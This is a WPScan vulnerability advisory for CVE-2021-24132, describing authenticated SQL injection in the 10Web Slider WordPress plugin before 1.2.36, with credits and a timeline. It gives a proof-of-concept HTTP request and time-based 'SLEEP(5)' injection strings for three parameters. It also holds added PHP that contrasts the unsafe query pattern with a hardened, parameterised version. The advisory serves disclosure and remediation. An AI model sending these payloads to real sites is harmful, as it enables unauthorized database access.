WPScan

WordPress Plugin Vulnerabilities

Slider by 10Web < 1.2.36 - Multiple Authenticated SQL Injection

Description

The bulk_action, export_full and save_slider_db functionalities of the plugin were vulnerable, allowing a high privileged user (Admin), or a medium one such as Contributor+ (if "Role Options" is turned on for other users), to perform SQL Injection attacks.

Proof of Concept

Vulnerable param: `check[]`
Vulnerable function: WDW_S_Library::get

```http
POST /wp-admin/admin.php?page=sliders_wds HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 201

s=&bulk_action=duplicate&check%5BSLEEP(5)%5D=on&select_slider_merge=-select-&imagesexport=on&nonce_wd=e7f3386825&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dsliders_wds&task=duplicate&current_id=
```

Other SQLi:

- File: admin/models/WDSModelWDSExport.php
- Function: export_full
- Params: slider_ids_string
- PoC: Insert one slider with id = 1 and set $slider_ids_string to string: 1) AND SLEEP(5

- File: admin/controllers/Sliders.php
- Function: save_slider_db
- Params: del_slide_ids_string
- PoC: Insert one slider with id = 1 and set $del_slide_ids_string to string: 1) AND SLEEP(5
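Added illustration, not code from the plugin, from the changeset above or from WPScan: all three injection points take a caller-supplied list of slider or slide IDs (the keys of `check[]`, or a comma-separated string) and splice it into a query, which is why the payload `1) AND SLEEP(5` can close an `IN (...)` list and append its own condition. The reconstruction below is an assumption about that shape, shown next to a hardened version that casts every ID to an integer and emits one `%d` placeholder per value for `$wpdb->prepare()`; the function names and the table name are mine.

```php
<?php
// Added example reconstructing the id-list pattern described in the advisory.
// Not the plugin's real code; "example_slides" is an assumed table name.

// Vulnerable shape: the request string is concatenated into the query, so
// "1) AND SLEEP(5" closes the IN list and appends an attacker-chosen condition.
function build_delete_sql_unsafe(string $del_slide_ids_string): string
{
    return "DELETE FROM example_slides WHERE id IN (" . $del_slide_ids_string . ")";
}

// Hardened shape: split on commas, cast each element to int, drop anything
// that is not a positive id, and build the placeholder list for $wpdb->prepare().
function build_delete_sql_safe(string $del_slide_ids_string): array
{
    $ids = array_map('intval', explode(',', $del_slide_ids_string));
    $ids = array_values(array_filter($ids, function ($id) { return $id > 0; }));
    if (empty($ids)) {
        // Nothing valid to delete; also avoids the "IN ()" syntax error.
        return ['sql' => null, 'args' => []];
    }
    $placeholders = implode(',', array_fill(0, count($ids), '%d'));
    // Inside WordPress this pair would be passed as $wpdb->prepare($sql, $ids).
    return [
        'sql'  => "DELETE FROM example_slides WHERE id IN ($placeholders)",
        'args' => $ids,
    ];
}

// Same treatment for check[]: the PoC carried the payload in the array *keys*
// (check[SLEEP(5)]=on), so the keys, not the values, must be sanitised.
function sanitize_check_keys(array $check): array
{
    $ids = array_map('intval', array_keys($check));
    return array_values(array_filter($ids, function ($id) { return $id > 0; }));
}

// Constructed inputs taken from the advisory's PoC values.
$payload = '1) AND SLEEP(5';
echo build_delete_sql_unsafe($payload), "\n";
$safe = build_delete_sql_safe($payload);
echo $safe['sql'], ' | ', implode(',', $safe['args']), "\n";
print_r(sanitize_check_keys(['SLEEP(5)' => 'on', '7' => 'on']));
```

Running it shows the unsafe builder emitting the payload verbatim after the closing parenthesis, while the hardened builder reduces the same input to a single `%d` with argument `1`, and the `SLEEP(5)` key casts to 0 and is discarded so only id 7 survives.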

Affects Plugins

slider-wd
Fixed in version 1.2.36

References

CVE
CVE-2021-24132
URL
https://plugins.trac.wordpress.org/changeset/2389754

Classification

Type

SQLI

OWASP top 10
A1: Injection
CWE
CWE-89

Miscellaneous

Original Researcher

Nguyen Anh Tien - SunCSR (Sun* Cyber Security Research)

Submitter

Nguyen Anh Tien

Submitter website
https://research.sun-asterisk.com/
Submitter twitter
https://twitter.com/vigov5
Verified

Yes

WPVDB ID
c1f45000-6c16-4606-be80-1938a755af2c

Timeline

Publicly Published

2020-09-29 (about 1 year ago)

Added

2020-09-29 (about 1 year ago)

Last Updated

2021-01-21 (about 1 year ago)
